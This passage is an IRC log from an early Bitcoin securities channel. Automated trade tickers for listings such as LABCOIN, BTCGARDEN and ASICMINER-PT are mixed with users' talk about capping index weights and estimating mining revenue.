17:38:36 its about market cap only atm Aug 03 17:39:13 "millions" ... Aug 03 17:39:14 but i agree that there should be a max value for the index share, like 25% for asicminer Aug 03 17:39:19 millions is a bit farfetched, no? Aug 03 17:39:55 :) Aug 03 17:40:05 Yes but you're rich, goat. Aug 03 17:40:05 [BTCTC] [LABCOIN] 15 @ 0.001751 = 0.0263 BTC [-] Aug 03 17:40:07 [BTCTC] [LABCOIN] 500 @ 0.001751 = 0.8755 BTC [-] Aug 03 17:40:08 [BTCTC] [LABCOIN] 55 @ 0.00175 = 0.0963 BTC [-] Aug 03 17:40:10 [BTCTC] [LABCOIN] 35 @ 0.001749 = 0.0612 BTC [-] Aug 03 17:40:12 BigBitz tis what the mkt says what can i tell you. Aug 03 17:40:33 smidge you can't arbitrarily cap things out, it makes no sense. Aug 03 17:40:36 they are what they are. Aug 03 17:40:40 Chaaaang-Noi yes :) Aug 03 17:41:01 i know, but its a compromise Aug 03 17:41:23 yes, it's a compromise, but what are you compromising and on what basis ? Aug 03 17:41:54 [BTCTC] [BTCGARDEN] 50 @ 0.01601 = 0.8005 BTC [+] Aug 03 17:41:56 [BTCTC] [BTCGARDEN] 235 @ 0.016 = 3.76 BTC [-] Aug 03 17:42:04 its working for real world indices. dax has a cap at 10% per security, 30 of them in there in total. Aug 03 17:42:33 companies like siemens are capped at 10% Aug 03 17:42:36 [BTCTC] [BTCGARDEN] 102 @ 0.01607 = 1.6391 BTC [+] Aug 03 17:42:38 [BTCTC] [BTCGARDEN] 198 @ 0.01609 = 3.1858 BTC [+] Aug 03 17:43:19 dax is an index now ?! Aug 03 17:43:23 zee germanz... Aug 03 17:43:50 thats why i think a 25% cap would be a compromise between a pure mkt cap index with asicminer having 60,70% and a pure equal weight with 10 securities each having 10% Aug 03 17:44:02 [BTCTC] [KENILWORTH] 19 @ 0.001798 = 0.0342 BTC [-] Aug 03 17:44:20 i didn't know the dax is capped Aug 03 17:44:23 [BTCTC] [BTC-TRADING-PT] 5 @ 0.7808 = 3.904 BTC [-] Aug 03 17:44:27 it is Aug 03 17:44:28 but anyway, here are your problems : put am, mpex (and used to be sdice) in there, you've got 2 mn+ btc wiping everyone else into irrelevance. you don't put any of them well... it's weird parade. (which is wjhy i suggested making two categories) Aug 03 17:44:54 two categories, or the compromise listed above Aug 03 17:45:04 thats what it boils down to Aug 03 17:45:31 we'll see, its not even been runnign 24h Aug 03 17:45:44 actually you should probably have 3 : i. large ; 2. small ; 3. scam (or w/e, politely named, "no income yet") Aug 03 17:45:46 [BTCTC] [ACTIVEMINING] 25 @ 0.005663 = 0.1416 BTC [+] Aug 03 17:45:52 [HAVELOCK] [LABCO] 50 @ 0.003 = 0.15 BTC [+] Aug 03 17:46:46 you mean shining stars and two other buckets full of crap :) Aug 03 17:47:25 [BTCTC] [ASICMINER-PT] 1 @ 4.055 BTC [+] Aug 03 17:47:27 [BTCTC] [ASICMINER-PT] 4 @ 4.051 = 16.204 BTC [-] Aug 03 17:47:35 well... like any garage sale, people like the crap buckets. Aug 03 17:47:45 yea they do Aug 03 17:47:58 anyways bbl, intersting discussion. thx Aug 03 17:48:29 if anyone has more to add pls post in teh thread Aug 03 17:48:29 smidge: a company is excluded from the dax if it's weight exceeds 10 % or it's 30d volatility is heigher than 250 % Aug 03 17:48:58 its capped at 10%, how coould you exclude it Aug 03 17:49:04 bbl Aug 03 17:49:19 dexX7 the volatility part is true but also very problematic in btc Aug 03 17:49:52 just saying how things are done at dax, not that this concept should be used Aug 03 17:50:18 [BTCTC] [LABCOIN] 100 @ 0.00187 = 0.187 BTC [+] Aug 03 17:50:52 [BTCTC] [DMS.MINING] 4 @ 0.01144 = 0.0458 BTC [+] Aug 03 17:50:53 [BTCTC] [DMS.MINING] 20 @ 0.01144 = 0.2288 BTC [+] Aug 03 17:50:54 [BTCTC] [DMS.MINING] 67 @ 0.01145 = 0.7672 BTC [+] Aug 03 17:50:55 [BTCTC] [DMS.MINING] 40 @ 0.01149 = 0.4596 BTC [+] Aug 03 17:50:56 [BTCTC] [DMS.MINING] 347 @ 0.0115 = 3.9905 BTC [+] Aug 03 17:50:57 [BTCTC] [DMS.MINING] 5 @ 0.0119 = 0.0595 BTC [+] Aug 03 17:50:58 [BTCTC] [DMS.MINING] 126 @ 0.01199 = 1.5107 BTC [+] Aug 03 17:50:59 [BTCTC] [DMS.MINING] 1079 @ 0.012 = 12.948 BTC [+] Aug 03 17:52:22 yea Aug 03 17:52:35 [BTCTC] [BTCGARDEN] 202 @ 0.01609 = 3.2502 BTC [+] Aug 03 17:53:40 [BTCTC] [LABCOIN] 22 @ 0.001722 = 0.0379 BTC [-] Aug 03 17:53:42 [BTCTC] [LABCOIN] 6 @ 0.001721 = 0.0103 BTC [-] Aug 03 17:53:43 [BTCTC] [LABCOIN] 134 @ 0.00172 = 0.2305 BTC [-] Aug 03 17:53:44 [BTCTC] [LABCOIN] 3000 @ 0.00171 = 5.13 BTC [-] Aug 03 17:55:27 [BTCTC] [BTCGARDEN] 37 @ 0.01601 = 0.5924 BTC [-] Aug 03 17:57:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.03989 BTC [-] Aug 03 18:01:47 [BTCTC] [BTCGARDEN] 33 @ 0.01601 = 0.5283 BTC [-] Aug 03 18:01:48 [BTCTC] [BTCGARDEN] 67 @ 0.016 = 1.072 BTC [-] Aug 03 18:03:11 [BTCTC] [DMS.PURCHASE] 74 @ 0.03394 = 2.5116 BTC [-] Aug 03 18:06:38 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.002978 = 0.1489 BTC [+] Aug 03 18:08:29 [BTCTC] [BFMINES] 75 @ 0.004 = 0.3 BTC [+] Aug 03 18:11:56 [BTCTC] [BTCGARDEN] 21 @ 0.016 = 0.336 BTC [-] Aug 03 18:13:11 [BTCTC] [ASICMINER-PT] 11 @ 4.05 = 44.55 BTC [-] Aug 03 18:14:12 [BTCTC] [TAT.ASICMINER] 13 @ 0.03859 = 0.5017 BTC [-] Aug 03 18:14:13 [BTCTC] [TAT.ASICMINER] 37 @ 0.03859 = 1.4278 BTC [-] Aug 03 18:14:35 [BTCTC] [LABCOIN] 4 @ 0.00171 = 0.0068 BTC [-] Aug 03 18:15:12 [BTCTC] [LABCOIN] 4500 @ 0.00171 = 7.695 BTC [-] Aug 03 18:16:23 [BTCTC] [ASICMINER-PT] 1 @ 4.048 BTC [-] Aug 03 18:18:30 [BTCTC] [KENILWORTH] 1 @ 0.001798 BTC [-] Aug 03 18:20:45 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 03 18:21:09 [HAVELOCK] [LABCO] 84 @ 0.003 = 0.252 BTC [+] Aug 03 18:21:12 [HAVELOCK] [LABCO] 2 @ 0.00238 = 0.0048 BTC [-] Aug 03 18:21:14 [HAVELOCK] [LABCO] 30 @ 0.00237 = 0.0711 BTC [-] Aug 03 18:21:16 [HAVELOCK] [LABCO] 15 @ 0.00236002 = 0.0354 BTC [-] Aug 03 18:21:18 [HAVELOCK] [LABCO] 10 @ 0.00236001 = 0.0236 BTC [-] Aug 03 18:21:20 [HAVELOCK] [LABCO] 10 @ 0.00235 = 0.0235 BTC [-] Aug 03 18:21:22 [HAVELOCK] [LABCO] 36 @ 0.00234 = 0.0842 BTC [-] Aug 03 18:21:25 [HAVELOCK] [LABCO] 50 @ 0.00233 = 0.1165 BTC [-] Aug 03 18:21:27 [HAVELOCK] [LABCO] 1000 @ 0.0022 = 2.2 BTC [-] Aug 03 18:21:29 [HAVELOCK] [LABCO] 5 @ 0.002 = 0.01 BTC [-] Aug 03 18:21:30 [HAVELOCK] [LABCO] 25 @ 0.002 = 0.05 BTC [-] Aug 03 18:21:32 [HAVELOCK] [LABCO] 1 @ 0.00190002 BTC [-] Aug 03 18:21:34 [HAVELOCK] [LABCO] 832 @ 0.0018165 = 1.5113 BTC [-] Aug 03 18:21:37 [BTCTC] [KENILWORTH] 200 @ 0.001799 = 0.3598 BTC [+] Aug 03 18:21:38 [BTCTC] [KENILWORTH] 2500 @ 0.001799 = 4.4975 BTC [+] Aug 03 18:22:08 [BTCTC] [BTCGARDEN] 234 @ 0.01698 = 3.9733 BTC [+] Aug 03 18:22:28 [BTCTC] [BTCGARDEN] 60 @ 0.01699 = 1.0194 BTC [+] Aug 03 18:22:45 [BTCTC] [KENILWORTH] 10000 @ 0.0018 = 18 BTC [+] Aug 03 18:23:09 [BTCTC] [BTCGARDEN] 500 @ 0.017 = 8.5 BTC [+] Aug 03 18:23:10 [BTCTC] [BTCGARDEN] 196 @ 0.017 = 3.332 BTC [+] Aug 03 18:23:11 [BTCTC] [BTCGARDEN] 400 @ 0.01715 = 6.86 BTC [+] Aug 03 18:23:13 [BTCTC] [BTCGARDEN] 200 @ 0.01716 = 3.432 BTC [+] Aug 03 18:24:59 [BTCTC] [BITVPS] 100 @ 0.002194 = 0.2194 BTC [+] Aug 03 18:25:00 [BTCTC] [BITVPS] 284 @ 0.0022 = 0.6248 BTC [+] Aug 03 18:25:01 [BTCTC] [BITVPS] 98 @ 0.00222 = 0.2176 BTC [+] Aug 03 18:25:02 [BTCTC] [BITVPS] 100 @ 0.00225 = 0.225 BTC [+] Aug 03 18:25:03 [BTCTC] [BITVPS] 1 @ 0.002272 BTC [+] Aug 03 18:25:04 [BTCTC] [BITVPS] 1000 @ 0.002272 = 2.272 BTC [+] Aug 03 18:25:06 [BTCTC] [BITVPS] 75 @ 0.002273 = 0.1705 BTC [+] Aug 03 18:25:07 [BTCTC] [BITVPS] 5000 @ 0.0023 = 11.5 BTC [+] Aug 03 18:25:35 [BTCTC] [LABCOIN] 2100 @ 0.00171 = 3.591 BTC [-] Aug 03 18:26:10 [BTCTC] [ACTIVEMINING] 25 @ 0.005689 = 0.1422 BTC [+] Aug 03 18:26:12 [BTCTC] [ACTIVEMINING] 6 @ 0.005688 = 0.0341 BTC [-] Aug 03 18:26:12 [BTCTC] [ACTIVEMINING] 12 @ 0.005681 = 0.0682 BTC [-] Aug 03 18:26:13 [BTCTC] [ACTIVEMINING] 50 @ 0.00568 = 0.284 BTC [-] Aug 03 18:26:14 [BTCTC] [ACTIVEMINING] 2 @ 0.005675 = 0.0114 BTC [-] Aug 03 18:26:16 [BTCTC] [ACTIVEMINING] 1 @ 0.005651 BTC [-] Aug 03 18:26:17 [BTCTC] [ACTIVEMINING] 6 @ 0.00565 = 0.0339 BTC [-] Aug 03 18:26:18 [BTCTC] [ACTIVEMINING] 3 @ 0.005634 = 0.0169 BTC [-] Aug 03 18:26:19 [BTCTC] [ACTIVEMINING] 5 @ 0.005633 = 0.0282 BTC [-] Aug 03 18:26:20 [BTCTC] [ACTIVEMINING] 7 @ 0.00563 = 0.0394 BTC [-] Aug 03 18:26:21 [BTCTC] [ACTIVEMINING] 7 @ 0.005611 = 0.0393 BTC [-] Aug 03 18:26:22 [BTCTC] [ACTIVEMINING] 30 @ 0.00561 = 0.1683 BTC [-] Aug 03 18:26:22 [BTCTC] [ACTIVEMINING] 75 @ 0.005601 = 0.4201 BTC [-] Aug 03 18:26:24 [BTCTC] [ACTIVEMINING] 300 @ 0.0056 = 1.68 BTC [-] Aug 03 18:26:35 [BTCTC] [ACTIVEMINING] 471 @ 0.005574 = 2.6254 BTC [-] Aug 03 18:27:18 [BTCTC] [ASICMINER-PT] 1 @ 3.984 BTC [-] Aug 03 18:27:20 [BTCTC] [ASICMINER-PT] 2 @ 3.982 = 7.964 BTC [-] Aug 03 18:27:21 [BTCTC] [ASICMINER-PT] 5 @ 3.98 = 19.9 BTC [-] Aug 03 18:27:22 [BTCTC] [ASICMINER-PT] 2 @ 3.98 = 7.96 BTC [-] Aug 03 18:27:23 [BTCTC] [ASICMINER-PT] 1 @ 3.971 BTC [-] Aug 03 18:27:25 [BTCTC] [ASICMINER-PT] 1 @ 3.962 BTC [-] Aug 03 18:27:26 [BTCTC] [ASICMINER-PT] 5 @ 3.962 = 19.81 BTC [-] Aug 03 18:27:27 [BTCTC] [ASICMINER-PT] 10 @ 3.961 = 39.61 BTC [-] Aug 03 18:27:27 [BTCTC] [ASICMINER-PT] 1 @ 3.957 BTC [-] Aug 03 18:28:25 [BTCTC] [BTCGARDEN] 50 @ 0.01718 = 0.859 BTC [+] Aug 03 18:28:38 [BTCTC] [BTCGARDEN] 500 @ 0.01718 = 8.59 BTC [+] Aug 03 18:28:39 [BTCTC] [BTCGARDEN] 59 @ 0.0171 = 1.0089 BTC [-] Aug 03 18:28:41 [BTCTC] [BTCGARDEN] 2441 @ 0.0165 = 40.2765 BTC [-] Aug 03 18:30:51 [BTCTC] [BITVPS] 510 @ 0.002383 = 1.2153 BTC [+] Aug 03 18:30:53 [BTCTC] [BITVPS] 100 @ 0.002489 = 0.2489 BTC [+] Aug 03 18:30:54 [BTCTC] [BITVPS] 1000 @ 0.002489 = 2.489 BTC [+] Aug 03 18:30:55 [BTCTC] [BITVPS] 50 @ 0.00289 = 0.1445 BTC [+] Aug 03 18:30:56 [BTCTC] [BITVPS] 100 @ 0.002899 = 0.2899 BTC [+] Aug 03 18:30:56 [BTCTC] [BITVPS] 80 @ 0.00294 = 0.2352 BTC [+] Aug 03 18:31:38 [BTCTC] [KENILWORTH] 18626 @ 0.0018 = 33.5268 BTC [+] Aug 03 18:32:14 [HAVELOCK] [XBOND] 10 @ 0.001029 = 0.0103 BTC [+] Aug 03 18:32:28 [BTCTC] [BTCGARDEN] 500 @ 0.0172 = 8.6 BTC [+] Aug 03 18:32:30 [BTCTC] [BTCGARDEN] 200 @ 0.01728 = 3.456 BTC [+] Aug 03 18:32:31 [BTCTC] [BTCGARDEN] 500 @ 0.01741 = 8.705 BTC [+] Aug 03 18:32:32 [BTCTC] [BTCGARDEN] 2 @ 0.01742 = 0.0348 BTC [+] Aug 03 18:32:33 [BTCTC] [BTCGARDEN] 200 @ 0.01742 = 3.484 BTC [+] Aug 03 18:32:34 [BTCTC] [BTCGARDEN] 200 @ 0.01744 = 3.488 BTC [+] Aug 03 18:32:35 [BTCTC] [BTCGARDEN] 1 @ 0.01744 BTC [+] Aug 03 18:32:37 [BTCTC] [BTCGARDEN] 4 @ 0.01748 = 0.0699 BTC [+] Aug 03 18:32:37 [BTCTC] [BTCGARDEN] 25 @ 0.01749 = 0.4373 BTC [+] Aug 03 18:32:38 [BTCTC] [BTCGARDEN] 24 @ 0.0175 = 0.42 BTC [+] Aug 03 18:32:39 [BTCTC] [BTCGARDEN] 300 @ 0.01759 = 5.277 BTC [+] Aug 03 18:32:46 [HAVELOCK] [XBOND] 8 @ 0.001029 = 0.0082 BTC [+] Aug 03 18:32:49 Someone is bored and buying * Aug 03 18:32:49 [HAVELOCK] [XBOND] 9 @ 0.001029 = 0.0093 BTC [+] Aug 03 18:33:28 [BTCTC] [BTCGARDEN] 47 @ 0.0166 = 0.7802 BTC [-] Aug 03 18:33:30 [BTCTC] [BTCGARDEN] 559 @ 0.0165 = 9.2235 BTC [-] Aug 03 18:35:25 [BTCTC] [BTCGARDEN] 5 @ 0.0176 = 0.088 BTC [+] Aug 03 18:35:27 [BTCTC] [BTCGARDEN] 33 @ 0.0176 = 0.5808 BTC [+] Aug 03 18:35:28 [BTCTC] [BTCGARDEN] 1990 @ 0.0176 = 35.024 BTC [+] Aug 03 18:35:37 [BTCTC] [LABCOIN] 20 @ 0.001868 = 0.0374 BTC [+] Aug 03 18:35:38 [BTCTC] [LABCOIN] 200 @ 0.001888 = 0.3776 BTC [+] Aug 03 18:35:39 [BTCTC] [LABCOIN] 280 @ 0.00189 = 0.5292 BTC [+] Aug 03 18:36:02 [BTCTC] [TAT.ASICMINER] 50 @ 0.039 = 1.95 BTC [+] Aug 03 18:36:18 [BTCTC] [LABCOIN] 119 @ 0.00189 = 0.2249 BTC [+] Aug 03 18:37:08 [BTCTC] [ASICMINER-PT] 1 @ 3.997 BTC [+] Aug 03 18:37:37 [BTCTC] [ASICMINER-PT] 1 @ 3.901 BTC [-] Aug 03 18:37:38 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [-] Aug 03 18:37:40 [BTCTC] [ASICMINER-PT] 1 @ 3.881 BTC [-] Aug 03 18:37:41 [BTCTC] [ASICMINER-PT] 3 @ 3.88 = 11.64 BTC [-] Aug 03 18:37:42 [BTCTC] [ASICMINER-PT] 2 @ 3.874 = 7.748 BTC [-] Aug 03 18:37:43 [BTCTC] [ASICMINER-PT] 4 @ 3.873 = 15.492 BTC [-] Aug 03 18:39:50 [BTCTC] [ASICMINER-PT] 1 @ 3.998 BTC [+] Aug 03 18:39:50 [BTCTC] [ASICMINER-PT] 6 @ 4 = 24 BTC [+] Aug 03 18:40:17 [BTCTC] [BITVPS] 297 @ 0.00289 = 0.8583 BTC [-] Aug 03 18:40:19 [BTCTC] [BITVPS] 1700 @ 0.003 = 5.1 BTC [+] Aug 03 18:40:20 [BTCTC] [BITVPS] 90 @ 0.003 = 0.27 BTC [+] Aug 03 18:40:58 good thing they are Aug 03 18:41:28 i'm bored too :p Aug 03 18:41:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.03982 = 0.4778 BTC [+] Aug 03 18:41:30 [BTCTC] [TAT.ASICMINER] 50 @ 0.03983 = 1.9915 BTC [+] Aug 03 18:42:28 [BTCTC] [ASICMINER-PT] 3 @ 3.997 = 11.991 BTC [-] Aug 03 18:44:49 [HAVELOCK] [AM100] 25 @ 0.0385 = 0.9625 BTC [+] Aug 03 18:46:55 [BTCTC] [ACTIVEMINING] 25 @ 0.005565 = 0.1391 BTC [-] Aug 03 18:46:57 [BTCTC] [ACTIVEMINING] 22 @ 0.005564 = 0.1224 BTC [-] Aug 03 18:46:58 [BTCTC] [ACTIVEMINING] 168 @ 0.005562 = 0.9344 BTC [-] Aug 03 18:47:24 [BTCTC] [LABCOIN] 20 @ 0.001711 = 0.0342 BTC [-] Aug 03 18:47:26 [BTCTC] [LABCOIN] 4 @ 0.00171 = 0.0068 BTC [-] Aug 03 18:47:27 [BTCTC] [LABCOIN] 976 @ 0.001709 = 1.668 BTC [-] Aug 03 18:47:55 heya Aug 03 18:48:05 how goes it Aug 03 18:48:26 [BTCTC] [BTCGARDEN] 100 @ 0.0161 = 1.61 BTC [-] Aug 03 18:48:27 joesmoe what up man? Aug 03 18:48:53 [BTCTC] [LABCOIN] 900 @ 0.001902 = 1.7118 BTC [+] Aug 03 18:48:56 [BTCTC] [ASICMINER-PT] 1 @ 3.911 BTC [-] Aug 03 18:49:03 hehe chillen. About to head over to Sziget festivatl tomorrow in hugary. Aug 03 18:49:11 how are you guys Aug 03 18:49:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.03983 = 1.9915 BTC [+] Aug 03 18:49:49 well if you ever need any help planning, I've been traveling around for years. Aug 03 18:50:03 i highly recommend south america, it's the best place in the world to backpack right now imho Aug 03 18:50:17 It's cheap to get around, food is cheap, lots of people in south america like to travel too Aug 03 18:50:25 I spent 6-7 months in south america last year. Aug 03 18:50:29 [BTCTC] [ASICMINER-PT] 2 @ 3.911 = 7.822 BTC [-] Aug 03 18:50:29 Lars in Peru Aug 03 18:50:58 heheh, i know the feeling Aug 03 18:51:10 [BTCTC] [DMS.SELLING] 17 @ 0.025 = 0.425 BTC [+] Aug 03 18:51:37 [HAVELOCK] [XBOND] 9 @ 0.001029 = 0.0093 BTC [+] Aug 03 18:51:55 [BTCTC] [ACTIVEMINING] 25 @ 0.005565 = 0.1391 BTC [+] Aug 03 18:51:56 [BTCTC] [ACTIVEMINING] 44 @ 0.005564 = 0.2448 BTC [-] Aug 03 18:51:57 [BTCTC] [ACTIVEMINING] 132 @ 0.005562 = 0.7342 BTC [-] Aug 03 18:51:58 [BTCTC] [ACTIVEMINING] 214 @ 0.005543 = 1.1862 BTC [-] Aug 03 18:51:59 [BTCTC] [ACTIVEMINING] 20 @ 0.005508 = 0.1102 BTC [-] Aug 03 18:52:01 [BTCTC] [ACTIVEMINING] 5 @ 0.005504 = 0.0275 BTC [-] Aug 03 18:52:02 [BTCTC] [ACTIVEMINING] 10 @ 0.0055 = 0.055 BTC [-] Aug 03 18:52:03 [BTCTC] [ACTIVEMINING] 5 @ 0.005481 = 0.0274 BTC [-] Aug 03 18:52:04 [BTCTC] [ACTIVEMINING] 20 @ 0.00548 = 0.1096 BTC [-] Aug 03 18:52:05 [BTCTC] [ACTIVEMINING] 5 @ 0.005401 = 0.027 BTC [-] Aug 03 18:52:06 [BTCTC] [ACTIVEMINING] 20 @ 0.0054 = 0.108 BTC [-] Aug 03 18:54:39 [BTCTC] [DMS.SELLING] 17 @ 0.025 = 0.425 BTC [+] Aug 03 18:55:13 [BTCTC] [TAT.ASICMINER] 39 @ 0.03983 = 1.5534 BTC [+] Aug 03 18:55:43 [HAVELOCK] [XBOND] 88 @ 0.001029 = 0.0906 BTC [+] Aug 03 18:56:34 [BTCTC] [BTCGARDEN] 200 @ 0.01739 = 3.478 BTC [+] Aug 03 18:56:36 [BTCTC] [BTCGARDEN] 400 @ 0.01739 = 6.956 BTC [+] Aug 03 18:56:37 [BTCTC] [BTCGARDEN] 79 @ 0.0174 = 1.3746 BTC [+] Aug 03 18:59:07 [BTCTC] [BITVPS] 432 @ 0.002305 = 0.9958 BTC [-] Aug 03 18:59:08 [BTCTC] [BITVPS] 250 @ 0.002304 = 0.576 BTC [-] Aug 03 18:59:27 joesmoe you misspelled schmoe! Aug 03 18:59:37 hehehe Aug 03 18:59:39 lol Aug 03 19:00:46 [BTCTC] [DMS.MINING] 100 @ 0.01092 = 1.092 BTC [-] Aug 03 19:01:25 [BTCTC] [LABCOIN] 7 @ 0.001751 = 0.0123 BTC [-] Aug 03 19:02:09 [BTCTC] [DMS.SELLING] 80 @ 0.0251 = 2.008 BTC [+] Aug 03 19:02:44 [HAVELOCK] [LABCO] 16 @ 0.00199 = 0.0318 BTC [+] Aug 03 19:03:09 [BTCTC] [DMS.MINING] 1 @ 0.01199 BTC [+] Aug 03 19:03:38 [BTCTC] [BITVPS] 1 @ 0.003397 BTC [+] Aug 03 19:04:33 [HAVELOCK] [XBOND] 1 @ 0.001029 BTC [+] Aug 03 19:08:34 [BTCTC] [BTCGARDEN] 20 @ 0.01651 = 0.3302 BTC [-] Aug 03 19:09:20 [BTCTC] [BTCGARDEN] 80 @ 0.01651 = 1.3208 BTC [-] Aug 03 19:11:35 [BTCTC] [DMS.MINING] 9 @ 0.01199 = 0.1079 BTC [+] Aug 03 19:11:36 [BTCTC] [DMS.MINING] 9 @ 0.01199 = 0.1079 BTC [+] Aug 03 19:12:03 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.002801 = 0.042 BTC [-] Aug 03 19:13:04 [HAVELOCK] [VTX] 4 @ 0.4513 = 1.8052 BTC [-] Aug 03 19:13:32 [HAVELOCK] [LABCO] 884 @ 0.00199 = 1.7592 BTC [+] Aug 03 19:13:46 [BTCTC] [ACTIVEMINING] 25 @ 0.005639 = 0.141 BTC [+] Aug 03 19:13:48 [BTCTC] [ACTIVEMINING] 50 @ 0.00564 = 0.282 BTC [+] Aug 03 19:13:48 [BTCTC] [ACTIVEMINING] 9 @ 0.005642 = 0.0508 BTC [+] Aug 03 19:14:26 [BTCTC] [LABCOIN] 1 @ 0.001876 BTC [+] Aug 03 19:14:27 [BTCTC] [LABCOIN] 10 @ 0.001877 = 0.0188 BTC [+] Aug 03 19:15:06 [BTCTC] [LABCOIN] 1 @ 0.001879 BTC [+] Aug 03 19:15:54 [BTCTC] [LABCOIN] 15 @ 0.001879 = 0.0282 BTC [+] Aug 03 19:16:26 [BTCTC] [DMS.SELLING] 8 @ 0.0251 = 0.2008 BTC [+] Aug 03 19:16:31 [BTCTC] [ASICMINER-PT] 1 @ 4.07 BTC [+] Aug 03 19:17:14 [BTCTC] [ASICMINER-PT] 1 @ 4.07 BTC [+] Aug 03 19:17:47 [BTCTC] [ACTIVEMINING] 25 @ 0.005507 = 0.1377 BTC [-] Aug 03 19:17:49 [BTCTC] [ACTIVEMINING] 575 @ 0.005506 = 3.166 BTC [-] Aug 03 19:19:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.03986 BTC [+] Aug 03 19:20:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.03985 = 0.0797 BTC [-] Aug 03 19:20:48 [BTCTC] [TAT.ASICMINER] 8 @ 0.03986 = 0.3189 BTC [+] Aug 03 19:20:56 [BTCTC] [BTCGARDEN] 34 @ 0.01718 = 0.5841 BTC [+] Aug 03 19:20:58 [BTCTC] [BTCGARDEN] 55 @ 0.01719 = 0.9455 BTC [+] Aug 03 19:21:00 [BTCTC] [BTCGARDEN] 40 @ 0.0172 = 0.688 BTC [+] Aug 03 19:21:01 [BTCTC] [BTCGARDEN] 45 @ 0.01721 = 0.7745 BTC [+] Aug 03 19:22:29 [BTCTC] [DMS.SELLING] 1 @ 0.0251 BTC [+] Aug 03 19:25:47 [BTCTC] [DMS.PURCHASE] 250 @ 0.03387 = 8.4675 BTC [-] Aug 03 19:27:34 [BTCTC] [TAT.MINIGAME] 1 @ 0.000257 BTC [+] Aug 03 19:27:46 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.002978 = 0.0179 BTC [+] Aug 03 19:27:53 [BTCTC] [DMS.PURCHASE] 26 @ 0.03387 = 0.8806 BTC [-] Aug 03 19:35:47 [BTCTC] [BTCGARDEN] 125 @ 0.01725 = 2.1563 BTC [+] Aug 03 19:37:16 so whats btcgarden market cap at? Aug 03 19:37:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005858 BTC [+] Aug 03 19:37:47 [BTCTC] [LABCOIN] 10 @ 0.001812 = 0.0181 BTC [-] Aug 03 19:37:48 [BTCTC] [LABCOIN] 34 @ 0.001812 = 0.0616 BTC [-] Aug 03 19:38:41 34k Aug 03 19:39:25 makes sense Aug 03 19:40:27 [BTCTC] [BTCGARDEN] 125 @ 0.0173 = 2.1625 BTC [+] Aug 03 19:40:28 [BTCTC] [BTCGARDEN] 198 @ 0.0174 = 3.4452 BTC [+] Aug 03 19:40:29 [BTCTC] [BTCGARDEN] 177 @ 0.0175 = 3.0975 BTC [+] Aug 03 19:41:10 [BTCTC] [BTCGARDEN] 83 @ 0.0175 = 1.4525 BTC [+] Aug 03 19:41:11 [BTCTC] [BTCGARDEN] 17 @ 0.01759 = 0.299 BTC [+] Aug 03 19:41:36 [BTCTC] [BTCGARDEN] 20 @ 0.01759 = 0.3518 BTC [+] Aug 03 19:41:47 [HAVELOCK] [SMG] 5 @ 0.0002449 = 0.0012 BTC [+] Aug 03 19:41:58 [BTCTC] [BTCGARDEN] 6 @ 0.01769 = 0.1061 BTC [+] Aug 03 19:42:54 [BTCTC] [BTCGARDEN] 39 @ 0.01769 = 0.6899 BTC [+] Aug 03 19:46:43 does anyone know how much coins avalon and friedcat made per month or whatever? veery roughly is okay.. just to get a feeling for the magnitude.. Aug 03 19:46:57 [BTCTC] [DMS.MINING] 3 @ 0.012 = 0.036 BTC [+] Aug 03 19:47:19 fc should be around 1k per day? Aug 03 19:47:32 Damn Aug 03 19:48:10 how many coins is labcoin and btcgarden bringing in atm? Aug 03 19:48:16 i mean mining Aug 03 19:48:22 [BTCTC] [LABCOIN] 50 @ 0.00181 = 0.0905 BTC [-] Aug 03 19:48:24 [BTCTC] [LABCOIN] 1000 @ 0.00175 = 1.75 BTC [-] Aug 03 19:48:24 dexX7 between 50 and 100k total so far. Aug 03 19:48:27 well, that's an estimate. 20 % hashing = 720 btc + hardware sales ... but this far away from constant though - maybe 500 / day is more accurate Aug 03 19:48:30 thanks Aug 03 19:48:31 0 Aug 03 19:49:00 haha yea, 0 so far VanCleef Aug 03 19:49:18 oh, how weird Aug 03 19:49:30 i guess avalon made much more than fc Aug 03 19:49:37 but both those companies are worth about hmm over 35million dollars? Aug 03 19:49:53 [BTCTC] [BTCGARDEN] 100 @ 0.01772 = 1.772 BTC [+] Aug 03 19:50:25 and currently own 0% of the mining network? Aug 03 19:50:28 that's genius Aug 03 19:50:28 [BTCTC] [DMS.MINING] 234 @ 0.0111 = 2.5974 BTC [-] Aug 03 19:50:29 lab is tiny compared to garden with 7k or 14k now Aug 03 19:50:29 [BTCTC] [DMS.MINING] 18 @ 0.01092 = 0.1966 BTC [-] Aug 03 19:50:30 [BTCTC] [DMS.MINING] 124 @ 0.01001 = 1.2412 BTC [-] Aug 03 19:50:52 well.. like mp said. mpoe has a market cap of 800k? :p Aug 03 19:50:56 [BTCTC] [DMS.SELLING] 6 @ 0.0244 = 0.1464 BTC [-] Aug 03 19:50:57 [BTCTC] [DMS.SELLING] 494 @ 0.0243 = 12.0042 BTC [-] Aug 03 19:51:10 [BTCTC] [LABCOIN] 929 @ 0.001733 = 1.61 BTC [-] Aug 03 19:51:11 VanCleef hardly. Aug 03 19:51:15 [BTCTC] [LABCOIN] 17 @ 0.001732 = 0.0294 BTC [-] Aug 03 19:51:16 [BTCTC] [LABCOIN] 71 @ 0.00173 = 0.1228 BTC [-] Aug 03 19:51:35 [BTCTC] [DMS.MINING] 3 @ 0.01 = 0.03 BTC [-] Aug 03 19:51:35 [BTCTC] [DMS.MINING] 121 @ 0.0099 = 1.1979 BTC [-] Aug 03 19:51:51 dexX7 yeah. thing is s.mpoe was over half a mil btc back when asicminer was worth ~0. Aug 03 19:52:47 [BTCTC] [DMS.MINING] 20 @ 0.01 = 0.2 BTC [+] Aug 03 19:52:49 [BTCTC] [DMS.MINING] 129 @ 0.0099 = 1.2771 BTC [-] Aug 03 19:53:03 [BTCTC] [DMS.PURCHASE] 500 @ 0.03387 = 16.935 BTC [-] Aug 03 19:53:13 [BTCTC] [ACTIVEMINING] 10 @ 0.005554 = 0.0555 BTC [-] Aug 03 19:53:21 [BTCTC] [BTCGARDEN] 100 @ 0.01772 = 1.772 